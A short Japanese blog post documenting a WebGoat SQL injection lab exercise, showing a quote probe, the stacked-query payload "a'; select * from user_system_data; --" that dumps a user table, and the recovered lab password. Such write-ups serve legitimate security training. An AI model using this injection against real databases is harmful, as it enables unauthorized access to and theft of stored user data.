shikata ga nai

Private? There is no such things.

WebGOATでSQL Injection (advanced)⓷を演習してみた

Hello there, ('ω')ノ

 

WebGOATでSQL Injection (advanced)⓷を選択して。

まずは、よくあるパターンで下記を入力して動作確認を。

 '

 

f:id:ThisIsOne:20200723091729p:plain

 

下記のSQL文を発行すると情報を得ることができて。

 a'; select * from user_system_data; --

 

f:id:ThisIsOne:20200723084655p:plain

 

得られた情報からパスワードを入力してクリアできた。

 passW0rD

 

f:id:ThisIsOne:20200723085003p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain